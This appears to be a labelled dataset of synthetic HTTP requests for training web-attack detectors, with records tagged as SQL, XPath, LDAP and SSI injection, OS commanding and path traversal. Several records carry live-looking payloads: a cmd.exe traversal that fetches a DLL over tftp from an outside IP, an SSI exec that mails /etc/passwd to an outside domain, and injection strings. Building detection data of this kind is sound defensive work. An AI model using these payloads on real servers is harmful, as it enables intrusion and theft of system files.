Cookie: ndeinet8izPIk=lrnM1;fni=0759297;PXxmlKl0r=cTS&es :++Atscriptnnwto 7;ot7ineN=4CPsb3y2
Cookie2: $Version="35"
Date: Wed, 21 Jul 04 19:40:29 GMT
ETag: W/"fCNJsPXSkO@bArMkGC"
Expect: uhxrdEf=ynXs4rl3
From: lmfapce@abHed.be
If-Modified-Since: Sun, 06 Apr 08 10:24:54 GMT
If-Unmodified-Since: Fri, 03 Dec 04 21:12:01 GMT
If-Match: *
If-None-Match: "1VZZsVfnxfUVMVId"
If-Range: Sat, 16 Dec 06 04:24:30 UTC
Max-Forwards: 4805
MIME-Version: 2.7
Pragma: no-cache
Proxy-Authorization: NTLM Ym50bGxsNGUxczRoMGhjdXFzeGlsb0xPNHJzaHppVDJmaWVlZW5u
Authorization: Rnue 3unc=tstl
Range: -3,456-488022
Referer: /nascesr/HrTsA/Sdfn/atlgt.asmx
TE: trailers
Trailer: Referer
User-Agent: esiDlsg (1KEmkw; n6u9wYZ7gg; eywky_gZZ)
UA-CPU: StrongARM
UA-Disp: 5047,8443,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 0464x327
Via: lbc/5.9 43.64.193.222, HTTP/0.9 133.29.83.73:6
Transfer-Encoding: gzip
Upgrade: nu7ne/3.2
Warning: 335 www.pAcueaen.jpg "dsav8ecoO" 
X-Forwarded-For: 101.164.70.181
X-Serial-Number: 785532867
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45117
Start - Id: 45436
class: PathTransversal
PUT /tat3oeiClesnt/OYOdivko01vXygscw/wAo2n/dySSA-PETRdiaLrzw.asmx? HTTP/1.0
Content-Length: 291
Content-Language: uxr,szti7Ass
Content-Encoding: identity
Content-Location: http://www.sxtsd.uk/a8b3di3h.msf
Content-MD5: bndPd040bjNJdnN0dDFFZQ==
Content-Type: application/x-www-form-urlencoded
Host: 70.78.35.21:8313
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: gzip, deflate
Accept-Language: o-scpe, oi70-huoie;q=0.8, ttu-cn;q=0.5, d-7;q=0.9, aos1sroi-r2td1Hhu;q=0.1
Cache-Control: max-age=4
Cookie: eiy=var3Ebte@sOp-e=;ael=dsLzt;ecmdK1fnph-rY=1znoCieia
Cookie2: $Version="71"
Date: Wed, 05 Mar 08 10:32:54 GMT
ETag: "cWVaQKspJRouILSecHXU"
Expect: 100-continue
If-Modified-Since: Thu, 25 Jan 07 01:36:42 CET
If-Unmodified-Since: Tue, 25 Dec 07 20:02:26 UTC
If-None-Match: *
If-Range: "32wpXhFQ1iN5.Pgnn5"
Max-Forwards: 4382
Referer: /etLdt/Hpnhb/na20te8x/daPTe6.jsp
Trailer: Pragma
User-Agent: NsHhje (wDrgYx-l; sBjNknt; enyUk3hnY; q7nxun; e55R9.6QZu)
Transfer-Encoding: deflate
X-Forwarded-For: 173.42.173.213
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Lawg6embwet= : aess%sloewiH&wc6BFOmh=8liets&56eiendlt=gmE.05jk2Bn&x8Ehnnds=owerPlhshdiMnr&hIlcefioc3=72&eR0speumor=zbsch5sincludenshutdownifear&s86eiT6ztaenr2t=dFLbjpH-j&gei=e6cdo/&FwinntxONRCMW-d0=E|eo&obHemahnsnnarf=../../../../../../WINNT/autoexec.bat&n0=e&EA2wes=63

End - Id: 45436
Start - Id: 49771
class: XPathInjection
GET /t0muSP/psnsauri.jpg?hfigoruIixr=bsTsgI&eeae1aa=816&tIntLey9hme6e=750300&sain8atdieu=gosuLtE5f57&iepfaesawhrnuie=e3qo&orbehyaardeln=eg&5uirEw=Otnir%27+++++or++++6++%3C+++count%28path%2Fchild%3A%3A*%29+++++or+%27aFucq%27+%3D++%27&noaseyseyw5fxoo=hrEJpo4qEZ&enctta=apcoIqxp_&inputvY94OtelnetUUNdgroup by=rphsee4ttotg&tjdc=99342367&nAon=+%5Bbetween%24esntt%28libc%3Coi%40et&ab9quohwie=98622638&Fzqexech@=r HTTP/1.1
Host: 103.49.26.95
Connection: close
Accept: */*
Accept-Charset: iso-8859-15, x-mac-roman;q=0.0, iso-2022-kr;q=0.4
Accept-Encoding: gzip;q=0.5
Accept-Language: ah-late;q=0.7
Cache-Control: max-stale=7
Client-ip: 253.1.218.202
Cookie: fGkt=gAecTa3i6rinzCsee;e9ncndttswauw8c=fromtup\ ;odoiti=opentseae0Tctsoljr4lt
Cookie2: $Version="2"
Date: Wed, 14 Feb 07 09:21:39 CET
ETag: W/"KnKCfoDimSyNjwBe9@oK"
Expect: 100-continue
From: pohawiI@9f0Ofa.ch
If-Modified-Since: Thu, 19 Mar 09 04:49:38 CET
If-Unmodified-Since: Sun, 09 Oct 05 18:10:36 UTC
If-Match: "p5-@7mBKpjv5oW8V-"
If-None-Match: *
If-Range: *
Max-Forwards: 406
MIME-Version: 6.9
Pragma: lEe9i3=efdin
Proxy-Authorization: Digest nonce
Authorization: bcCz htse=neornn
Range: 14795-998802,-1811,-6511
Referer: http://www.btto.gov/toaqo/rGdrTco/dwhceao.swf
TE: trailers,deflate,trailers
Trailer: Connection
User-Agent: Mozilla/7.9 (Machintosh; U; PPC Mac OS X 8.0; gt-ln; rv:6.4.0) Gecko/42329365
UA-CPU: Sparc
UA-Disp: 7451,3171,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 3095x7377
Via: 4.7 www.9ape.gif
Transfer-Encoding: gzip
Upgrade: sEr/5.8, wolisa/6.8
Warning: 313 www.rnatjdd.tiff "ikOaheaoton2wee" "Wed, 13 May 09 04:48:39 UTC"
X-Forwarded-For: 242.32.16.78
X-Serial-Number: 9273829516846529
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 49771
Start - Id: 48420
class: XPathInjection
GET /iAdotbttokidcu/retEspt6iNdyhenn/9idtsmaamAooQaeerces/tsF1ehAzox/oLrrIfJ-0v_xaTMX/zOY_RPXaM/ao6lbevbE2.html?6cXu024BNconnect3=iYOcetunion&RhUaM-=324073 HTTP/1.0
Host: 18.69.31.178:6142
Connection: CotecsR
Accept: */*;q=0.8
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=25840
Cookie: Indbw6lHvhttprj=eeq htaccesu[t[tT\evu;hto7esiaoseuts=l~(i;sd8nzsI70Earfn=hJqDhpG;3xeitulo9ao10na=(i <   count(4i/child::text())   and j   <    count(uodn/child::comment())  and   k   < count(tn/child::*)   );pwp-v@Ki=0evZ45nnnceh8Hv
Date: Wed, 23 May 07 08:26:44 GMT
If-Unmodified-Since: Wed, 25 Nov 09 04:59:44 UTC
If-Range: *
Referer: /rpo0v9.jsp
User-Agent: Mozilla/5.2 (Windows; U; WinNT 5.3; 9S-s3; rv:0.6.0) Gecko/17194767
X-Serial-Number: 948628218808
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48420
Start - Id: 44097
class: OsCommanding
GET /scripts/..%5c../winnt/system32/cmd.exe?/c+tftp%20-i%2062.107.47.226%20GET%20cool.dll%20c:\httpodbc.dll HTTP/1.0
Host: 199.61.162.229
Connection: close
Accept: */*
Accept-Charset: gb2312
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: max-stale=1814
Client-ip: 236.2.174.53
Cookie: iiirRb1eno=eITlig3aegeOeb;Roinetofoohn=eOtsE oso;ynwemts=9282433;ouNnc=5
Cookie2: $Version="94"
Date: Sun, 08 Aug 04 15:41:13 UTC
ETag: "6ppIn19@NaQSoJPiB"
Expect: 100-continue
From: ixam@eaec.uk
If-Modified-Since: Sat, 12 Dec 09 08:37:36 GMT
If-Unmodified-Since: Wed, 14 May 08 14:46:38 CET
If-Match: "Uv1ZNf812leJATaD"
If-None-Match: "V3Ha_YMdBSMA-AvjJ"
If-Range: Wed, 23 Sep 09 08:41:21 UTC
Max-Forwards: 3
MIME-Version: 0.4
Pragma: msG='Alw'
Proxy-Authorization: NTLM YTlha3RlZjlua29weWVzb2s3MW5yemFoMm5wbk4waVJzZW9ndG4zTGhpOGh0aQ==
Authorization: Digest uri=/taeZ9/rhunOa/vnpaf.mspx
Range: 70-
Referer: /Re09E/E0nf4nsI/hpPeyis/niietEt/hEad.pdf
TE: deflate;q=0.0
Trailer: If-Match
User-Agent: Mozilla/3.5 (Windows; U; WinNT 6.8; Tt-8w; rv:5.4.7) Gecko/34591240
UA-CPU: x86
UA-Disp: 6409,6413,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 1501x189
Via: HTTP/3.0 135.149.112.57
Transfer-Encoding: hOUe
Upgrade: unHis2/9.7, sDw/8.7
Warning: 552 www.5qeog.tiff "0tt4tuzwrsgn" 
X-Forwarded-For: 91.48.222.8
X-Serial-Number: 388289600968011
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44097
Start - Id: 48815
class: XPathInjection
GET /_dallPG2C37sginE5/3RRu/3ON92/_Cexec7a/tmpLrkOmvIWC/oa-fwyIJ/t8htaccesZnopimT3C/sfybOpaQ03tHu/aNjhnobe/s7apbt/9QaU/u0ue0.php4?eEle=exhex&enzfrora=77&autoexeczdNhKB=nestcoobq&tievsep0gesemY=h5WhetL&eeayilo2ds2tsEu=%28i+++++%3C++count%28oyrw9n%2Fchild%3A%3Atext%28%29%29+++and+++++j++++%3C++++count%28q2%2Fchild%3A%3Acomment%28%29%29+and++k+%3C+++count%28ao%2Fchild%3A%3A*%29+%29&HywioeTiomidH=028&UaautOgam0yt3=%3D5s1&hoaa4l4iukMs1d=+x&a3sts8jnoq=t-GB0sclom&2ryT42hn=eaAnn&RttrwDitrlchCrd=hyd&M1qLiEs=nrtnc7aevnAila&t0Ma=et3h%40&oeuo=+sq&E8lr0i2ris=ochm HTTP/1.0
Host: www.zttntAMss.uk
Connection: close
Accept: text/*
Accept-Charset: utf-7;q=0.3, iso-8859-9;q=0.1, iso-10646-ucs-2;q=0.4, iso-8859-6;q=0.4
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-transform
Client-ip: 166.142.219.107
Cookie: jRrAjU=t4ewdderrrar;o4=dati3uxcrsoa
Cookie2: $Version="5"
Date: Wed, 18 Mar 09 13:49:31 CET
ETag: "bWhoVxsRbvi6AiH"
Expect: 100-continue
From: 18kll@eaes.it
If-Modified-Since: Sun, 22 Nov 09 21:54:43 GMT
If-Unmodified-Since: Sat, 03 Jan 09 04:44:01 CET
If-Match: "e@nrx@bG2IYw9Bqyh"
If-None-Match: "iMpZ9IWn-oEGhQU"
If-Range: Sun, 10 Jul 05 02:03:38 UTC
Max-Forwards: 9136
MIME-Version: 7.6
Pragma: no-cache
Proxy-Authorization: Digest response="08bA7c67a569BFcBED9f6CeCC1e6B5Cb"
Authorization: Basic YWFrbGl5OnJhbldu
Range: 5920-3
Referer: http://www.ld3O.net/kteiud/csai/tesSh62/ogmcotAt.wav
TE: trailers
Trailer: If-Match
User-Agent: Mozilla/3.6 (compatible; Konqueror/9.5; Open BSD i386; rhbeeaq6u5; o8htzhI6; pieerybah)
UA-CPU: MIPS
UA-Disp: 8370,749,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 610x7320
Via: FTP/9.5 84.230.141.51
Transfer-Encoding: compress
Upgrade: DgPrai/4.4
Warning: 902 221.77.27.240 "H6v5cts" 
X-Forwarded-For: 30.210.172.155
X-Serial-Number: 5379207643
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 48815
Start - Id: 40624
class: SSI
GET /eiiedcio3etcenem/iaaenhsdpftedgon6e/vzyYZkkbU9_zE/dSp0Rbl@j/Emcaoavsqim/1systemKwYSEahtpassC76S/s5Ae9n@EORcllS2En.--/n3xfg_/jovnHuwegye4fdo/rs2rieTtgvayate/oNi.dJUT6Swd365FhyGY/uMvCxv@QY7Pf57PvR.aspx?joecw=drop9&nuui1JglocationAsystem=2889&frarwIle=mc&egpvxLaa7=dLGZH&fidr=mdt%7Et&C1ctn=9951668461&tro=olY&5vjcEeo3UiA=%3C%21--+++++%23include+++++virtual%3D%22d%3A%5Cwindows%5Cautoexec.bat%22++++--%3E&7hs=r9ul%7Edietlibelgneas&axaHous=d0dtollwsservices2adropre&mdrgcnEy=9 HTTP/1.0
Host: www.plaga3f.biz:8
Connection: fimoReit
Accept: */*
Accept-Charset: *;q=0.7
Accept-Encoding: compress;q=0.5, compress;q=0.2, compress, gzip, gzip
Accept-Language: *
Cache-Control: max-age=917
Client-ip: 134.67.83.123
Cookie: dssErcg=nEIZY7N5;teePhish=inv?txtermreini
Cookie2: $Version="48"
Date: Mon, 12 Dec 05 12:43:19 UTC
ETag: "IubpgWrdF_VsRCB06yK"
Expect: 100-continue
From: eneiaiie@acs8.cz
If-Modified-Since: Mon, 25 Feb 08 14:26:37 GMT
If-Unmodified-Since: Fri, 27 Nov 09 03:32:20 UTC
If-Match: "MczlTBXhvuKDCBux9lao"
If-None-Match: *
If-Range: "CzLcEa@yb2GNdmbL"
Max-Forwards: 5
MIME-Version: 8.9
Pragma: i=sgch
Proxy-Authorization: Basic bmx0aDBtYXU6ckFlUw==
Authorization: NTLM bzVyb0VoeWxkaXVuU3BhZXV1cmRlZWFhbm1iZWczd3U4
Range: 656012-5
Referer: /slhrbgh/huho/hfn0/orwa0o.asmx
TE: gzip
Trailer: Max-Forwards
User-Agent: Mozilla/4.4 (Machintosh; U; PPC 1.4; wb-ie; rv:7.4.7) Gecko/73394276
UA-Disp: 959,926,32
Via: 6.4 123.110.235.206
Transfer-Encoding: ri2g
Upgrade: Rmh/4.4, haai/8.8, sr7/0.2, 8syo/9.3, invat/6.5
Warning: 308 68.164.17.248 "itScteuheeanafg" 
X-Forwarded-For: 130.86.64.49
X-Serial-Number: 436049584968
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40624
Start - Id: 40167
class: SSI
GET /1cda/eO-Yh39hABBxQE.exe?noIhdl3es=%3C%21--++++%23exec+++++cmd%3D%22%2Fbin%2Fmail+++++eexyeh.com+%3C++++%2Fetc%2Fpasswd%22--%3E&fslr=437&SwhereTqirRcscript=accept HTTP/1.1
Host: 234.122.183.226:80
Connection: utlolh
Accept: text/xml
Accept-Charset: x-mac-chinesetrad;q=0.4, euc-cn, windows-1255
Accept-Encoding: *;q=0.7
Accept-Language: n-cl, egSnei-i, tfmto-Adsanm1, iKsaoe-7c;q=0.2
Cache-Control: min-fresh=77869
Client-ip: 165.96.86.136
Cookie: VIItzQJqgroup byphplT=s.K.R;max=ft;lku1=m+ae;n5it4cgimtb=569
Cookie2: $Version="360"
Date: Mon, 05 Apr 04 18:32:05 GMT
ETag: "I8NjgBcm-6Mpv6vNVdCg"
Expect: 100-continue
From: stce@ygsk.st
If-Modified-Since: Mon, 21 Aug 06 19:18:03 UTC
If-Unmodified-Since: Sun, 17 Aug 08 19:08:50 GMT
If-Match: *
If-None-Match: "gG9GNSFxRRKbQ2k"
If-Range: Sat, 26 Jul 08 09:39:19 GMT
Max-Forwards: 4
MIME-Version: 1.5
Pragma: no-cache
Proxy-Authorization: Basic cGNuY3Njczplbm9ybTQ=
Authorization: NTLM bnNhTzVvaG96dGFubGljSWhyYXBlbTdzZXRtaGljZWhrdWZzcG8=
Range: 728-,7-688430
Referer: /rxUtes/naF3i/1ouI/elb7E.wmn
TE: trailers
Trailer: Warning
User-Agent: Mozilla/6.7 (Machintosh; U; Mac OS X 2.4; uc-tt; rv:9.0.1) Gecko/21529477
UA-CPU: MIPS
UA-Disp: 832,4615,8
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 427x7361
Via: 0.0 20.23.193.181
Transfer-Encoding: compress
Upgrade: w70e/2.8, naoa/9.2, ror/0.7
Warning: 869 194.107.104.219 "zteAwiu4sn" 
X-Forwarded-For: 237.110.243.93
X-Serial-Number: 272830551507050380
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40167
Start - Id: 40745
class: SSI
GET /hkscudnhhe2bttr4Dod.exe?gotdfchebe5=qobjectErbody%29ii HTTP/1.1
Host: 195.195.173.63
Connection: close
Accept: image/jpeg;q=0.2, application/*, image/jpeg;q=0.5
Accept-Charset: *;q=0.6
Accept-Encoding: gzip;q=0.9, gzip;q=0.4, deflate;q=0.5, gzip, deflate
Accept-Language: *
Cache-Control: min-fresh=5696
Client-ip: 24.245.63.9
Cookie: tt0t1tgica6=<!--  #odbc     statement =    "select 3er5ss7, flc,     oedxce from  hwgnMe1ylt   order by  9,    235, 0"     -->;dHpssr=eqiiMW-4w.tu;Otdqrmtsea=vxfdZZp;ahmaLss= qe /xn;ssiianc6hh=isonmds1Cr6nnti
Date: Sun, 24 Feb 08 20:48:53 CET
ETag: "WBC4hZ8ZsaZI7nlPVfW"
Expect: odrfi=rnoEtnrt;i8yPq=3ngihde
If-Modified-Since: Mon, 15 Mar 10 12:38:16 UTC
If-Match: *
If-None-Match: *
If-Range: Sat, 15 Dec 07 21:36:46 GMT
Max-Forwards: 0585
Pragma: no-cache
Authorization: NTLM ZXJUNmQzaE5zYWxoaXN1N25ubmVvbm13c0J0c2V0cmhpanI=
Range: -959107
Referer: http://0sth.st/nYi8c.asp
Trailer: Max-Forwards
User-Agent: ey2L_qtx http://www.ar1t2nr.net
Via: 4.1 www.ueryW.jpg, 4.2 www.Etteab80.htm

null

End - Id: 40745
Start - Id: 48862
class: XPathInjection
GET /antolEonseiagw/bhiqeNds1opst/j8ilN8CA71bv8/al76g.mspx?lojnheO7s=passthru6y&Gt=+e%7Ea%2Fo%3B+htop&Fdgsdeif=t6iesli&5crtwe9e86ho=naayq86aoeIsnroti&1mwacrNri=mTwgetmeruo7u%7Eaina&nmo7h=sqlpar%27+or++++r%2Fvl%2Fchild%3A%3Anode%28%29%5Bprocessing-instruction%28%29%3D47%5D+++or++%27K9egx%27%3D++%27&ytrdisiCfea=oopadmin&aCsenh=%28ete+o%29ob&s57otdariia=r1a9CvdTdx HTTP/1.1
Host: www.mAYio.de
Connection: a5Pci
Accept: video/*, text/*;q=0.8, video/*;q=0.0
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: TTiunH-ter, YEEo-ao;q=0.0, Crin-0e5urI, s7kaihsa-lnikD;q=0.1, lOctoDev-Spwra;q=0.5
Cache-Control: no-transform
Client-ip: 244.92.124.81
Cookie: Felnsshb=gWUS1IMXXS;pgnwEa=veqch;wfss=97888;zrxLe=fezVi64
Cookie2: $Version="6"
Date: Sat, 28 Jun 08 04:51:40 CET
ETag: "_fRV_D@7oKn-qsK"
Expect: nrieT=25Gtie8;ndjsg9=nmre9sw
From: cSenj7od@i5ssuRhni.com
If-Modified-Since: Sat, 26 Sep 09 23:13:43 GMT
If-Unmodified-Since: Thu, 11 Nov 04 21:22:43 CET
If-Match: "uzooyO4TwcePAK1GPzAv"
If-None-Match: *
If-Range: Wed, 01 Sep 04 11:44:57 CET
Max-Forwards: 1
MIME-Version: 4.5
Pragma: no-cache
Proxy-Authorization: rXwoTy meuadn=etoi
Authorization: Basic ZnNlc2RrbGQ6dEdoaGhhRGY=
Range: 572-841,573-
Referer: /pLti7G/gnl9mfi/ibwidTs/saygt/75ntrs.conf
TE: chunked;q=0.7,chunked,gzip;q=0.0
Trailer: Accept-Charset
User-Agent: nPBCiY http://www.hstbo.cz
UA-CPU: MIPS
UA-Disp: 184,1119,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 1420x8323
Via: 5.6 www.f5iV4.tiff, 9n6/8.5 70.204.245.100
Transfer-Encoding: REal; iHyshvu=aoilttln
Upgrade: cntr/0.2, fRir/4.0, qalsS/7.9
Warning: 031 102.38.172.102 "nisa2e2yv" 
X-Forwarded-For: 156.103.50.172
X-Serial-Number: 6876836791453
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 48862
Start - Id: 43464
class: OsCommanding
GET /alri/sTttl3tE/jFPmm8bqgVxUu/H6CId5NR/RismmzastiaOllP.msf?m47tiqgevte=%27++++%3B+++++tftp+-c+++++get+++++www.reststst.com%3A%2Fninerele.tar&vHe8sse9s4t=dr0lf&ffirsttuhatI4=405432&1usrpo=32130810&Ieo=1083052690&1st=7331&6fg=uw&intascoThlc1uza=eNGDnBwuy&ncoyLtueqaanlsv=ix&el=2126&mLrSaetins5amqa=Hswhere&Sl@7=%29tR18eidrmeyeOro&@ejx2szx=96206309 HTTP/1.0
Host: 183.188.55.65:74125
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: iso-8859-8, isiri-3342;q=0.7, cp-936, hz-gb-2312;q=0.5, iso-8859-8
Accept-Encoding: deflate;q=0.3, compress;q=0.7, deflate
Accept-Language: icEiw-Chzs, ntartl-rwmOl;q=0.4, 8azFoeos-8T1;q=0.2
Cache-Control: no-transform
Client-ip: 5.223.71.17
Cookie: qic8onrtn9ntav=rFj3a
Cookie2: $Version="5"
Date: Mon, 29 Dec 08 10:28:17 GMT
ETag: W/"HdxF4Pc2cI8Pr7_vJL"
Expect: 8oyrtlas
From: t3bs@fsiaebtorf.it
If-Modified-Since: Fri, 15 May 09 13:44:44 UTC
If-Unmodified-Since: Sat, 02 Dec 06 17:23:50 GMT
If-Match: *
If-None-Match: "Xtwjr_G34e.3Xdu"
If-Range: *
Max-Forwards: 3796
MIME-Version: 6.8
Pragma: no-cache
Authorization: tUmcn a4hk=n4Iui
Referer: /eyhl.tar.gz
TE: chunked
Trailer: Proxy-Authorization
User-Agent: hgpSgkCd http://www.EHilr.biz
UA-Pixels: 828x8678
Via: HTTP/5.6 38.93.68.245:063, 4.4 www.nenTz.gif
Transfer-Encoding: compress
Upgrade: tgIia/4.5, tqrgN/1.9, ioi/4.3
Warning: 518 181.124.206.103:336 "aaIai6i" "Thu, 24 Feb 05 13:04:27 UTC"

null

End - Id: 43464
Start - Id: 43999
class: OsCommanding
GET /data/..��../..��../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: www.hgbf2.fr
Connection: keep-alive
Accept: audio/basic;q=0.2, application/*;q=0.3
Accept-Charset: gb2312;q=0.9, cp-932;q=0.4, x-mac-japanese, macintosh
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 89.252.55.156
Cookie: vr=twtaeznhart9nexoih;rDlstsaNITwtnqt=t&cZneuunionuy4~boot.inigmocha7;8O9QOEskWU=iEn~tanctqshrktB;rqqt4ucar9n=tw9N@-O;alelpe4eew=Eoyil;SmeD=76
Cookie2: $Version="691"
Date: Sat, 16 Jun 07 24:01:44 UTC
ETag: "WKKEhSDEdJpn_XZ.E"
Expect: inTns
From: 44fa@mshrPyo.gov
If-Modified-Since: Thu, 19 Jan 06 07:19:51 GMT
If-Unmodified-Since: Fri, 23 May 08 11:33:49 CET
If-Match: "US6yND.1@Sd7N1n"
If-None-Match: *
If-Range: "gc_XYyzHgev@FjjJ"
Max-Forwards: 3081
MIME-Version: 9.9
Pragma: 9=tyhewA
Proxy-Authorization: Qyeeu qzNllaee=zsachi
Authorization: Basic aW1lT2U6aWdzbm51a2g=
Range: 3-
Referer: http://www.Ilhsst.cz/atEnreDo/uuti/eegIZi/serch4h.css
TE: gzip,deflate,chunked
Trailer: Referer
User-Agent: ddsikolaseeieyl
UA-CPU: x86
UA-Disp: 402,257,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 5667x180
Via: 4.1 www.wuoe.css
Transfer-Encoding: ikai; mnotso=9pei
Upgrade: tIrc/4.2
Warning: 170 126.27.186.211 "do3kdsikezlS" "Fri, 29 May 09 15:50:00 UTC"
X-Forwarded-For: 55.100.34.25
X-Serial-Number: 337660
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43999
Start - Id: 37372
class: LdapInjection
GET /execDhzGegroup by/eozQlIAPI1_noxHD@H/Q7r9ZqeSOoptMF_/0nrAit/hoS/jSwb8Jy8b0/etavpatacijkgi0/lbmD_Jv.oX@YXlv30-f.shtml? HTTP/1.0
Host: www.fsoiiEs.st:591
Connection: emmc
Accept: text/html;q=0.0, audio/*;q=0.3
Accept-Charset: x-mac-chinesetrad;q=0.3, x-mac-icelandic, koi8
Accept-Encoding: 880)(&(objectClass=o6i)(|(sn =   dlei)(cn=3m   J*))
Accept-Language: *
Cache-Control: max-age=1732
Client-ip: 115.169.125.19
Cookie: no=dAgFJaNoKYp;etcGA55vX0=8esJtservices 64hEpxtejpv;eem=o0Da>likesk8af;tssadXdtOEdav=852301472
Cookie2: $Version="0"
Date: Tue, 27 Feb 07 23:05:14 GMT
Expect: attha
From: mBdt@z8nsodsh.cz
If-Modified-Since: Sat, 25 Oct 08 17:31:46 GMT
If-Unmodified-Since: Fri, 04 Jun 04 18:03:41 GMT
If-Match: "1up@yCYqu7igCx.oa"
If-None-Match: *
If-Range: Mon, 30 Jun 08 01:42:52 UTC
Max-Forwards: 556
MIME-Version: 8.3
Pragma: ah='l6u4Ee6H'
Authorization: NTLM VGFhbmRvRW8xMmc2RXRjcmp0N3g1b0FzRU9udGJsV3RvQ2hhc2xoQXRuaW5h
Range: -112070,72375-
Referer: /dpaepp/1nar/0aenshR/favs.pdf
TE: gzip,chunked
Trailer: Trailer
User-Agent: Mozilla/8.1 (Windows; U; Win 9x 2.5; oe-el; rv:8.1.9) Gecko/05699280
UA-CPU: x86
UA-OS: Win95
Via: HTTP/6.6 165.122.208.20, 3.2 www.olgwl.tiff, eole/2.8 www.titknNb.js
Transfer-Encoding: identity
Upgrade: 2B6/2.2
X-Forwarded-For: 170.106.4.226
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37372
Start - Id: 43386
class: OsCommanding
GET /ihjsvehbg/ouenoitte/img@dv5connectrwZ/8null/a86O4wDdRwGH-BefVxox/ksbtdnS/bttstopaa/enNO1P@OzveJsd68jp.png?77tqoms=tletj&inOn=3tsu1p8b%3Fa&hnnsdejqhhd=79301144&i56lmtrptS=ls++++-las++++%2Fhome%2F++++%7C&all.pI=ntfh%24umbintseei%5De%5C&nftapmyofTbe=071&frilohfnen704a=y9kKOGlMsi&xn2eb=d&re=6 HTTP/1.0
Host: www.btas5.fr
Connection: asnn2oen
Accept: application/x-tar;q=0.4, image/*
Accept-Charset: x-mac-icelandic
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale
Client-ip: 218.45.110.121
Cookie: @B1OFPmeHDH=2;coA4sEtfnsorlr=itnmetant(<;witqb
Cookie2: $Version="6"
Date: Sat, 20 Jan 07 03:23:59 CET
ETag: W/"oThLttcItnH6jh1_m"
Expect: a2s3toh=auieoceh
From: no4b@rasantepan.ch
If-Modified-Since: Thu, 18 Dec 08 11:50:24 UTC
If-Unmodified-Since: Mon, 17 Aug 09 06:44:39 GMT
If-Match: "J6Tl_jXgltnfTMX"
If-None-Match: *
If-Range: Tue, 01 Apr 08 05:25:46 GMT
Max-Forwards: 18
MIME-Version: 1.8
Pragma: lv0e='6dil'
Proxy-Authorization: Basic OGlldnM6aW5vdA==
Authorization: NTLM aUFhdDRtc2Z1dWVjdGhldW8zZWFlZWwzb3NTYmNkdWxlbkQ1YW90cm5xdEw5aG9h
Range: 6605-,-56,5118-
Referer: /oa3isg/qmtacbhm.bin
TE: deflate,trailers
Trailer: Upgrade
User-Agent: mBNofLjLR http://www.vSaainfy.biz
UA-CPU: PowerPC
UA-Disp: 5052,410,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 9788x122
Via: HTTP/7.1 159.253.182.165:7
Transfer-Encoding: identity
Upgrade: asl/7.8, ni0se/0.8, eramny/7.3, oiHet/2.2
Warning: 760 153.140.23.116 "tasreEom4" "Mon, 12 Apr 10 01:21:27 GMT"
X-Forwarded-For: 207.33.218.68
X-Serial-Number: 68319129
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43386
Start - Id: 35254
class: SqlInjection
GET /43_izmd.THEwinntkw/oiwroemS8x/ob.asp?etm2H2hm=779&lthlrteepq6l=004671&dgtf=edrc3a5tlegtritoet&Jnb0t5n=2774781&nFfshAT5re=+OR++2++%3E+++++1&lmgItfneht=518&cotrejusaitaio3=3&sigetmA5see=13&4eirgh7SN=hseasesteeesoonw HTTP/1.1
Host: www.elsaise.de
Connection: close
Accept: */*
Accept-Charset: iso-8859-6
Accept-Encoding: compress, deflate;q=0.9, compress
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 149.160.7.148
Cookie: mE=gGBo;yami3h6ed1hH=rad;tgdee=b1GGs;xZQD= :anO-8z
Cookie2: $Version="4"
Date: Sun, 10 Dec 06 16:53:13 UTC
ETag: "87HLJk6rTg0sgJKoxC"
Expect: 8nlRin
From: ieogO97c@1xtO.uk
If-Modified-Since: Mon, 26 Jun 06 06:10:40 GMT
If-Unmodified-Since: Thu, 25 Sep 08 11:11:24 GMT
If-Match: *
If-None-Match: *
If-Range: Mon, 31 Dec 07 10:19:19 UTC
Max-Forwards: 6871
MIME-Version: 2.3
Pragma: no-cache
Proxy-Authorization: 8eEcs dejCatel=tunerro
Authorization: NTLM dGVjYW9lM2FJZnRjYWhzZWVwaTNyZWdkZDR5YVR0NmFkaXI0b2JPc3NJYTI2bjF1
Range: 275-
Referer: http://oreutsh.net/ogcsenoc/slum9.js
TE: trailers,trailers,deflate;q=0.7
Trailer: User-Agent
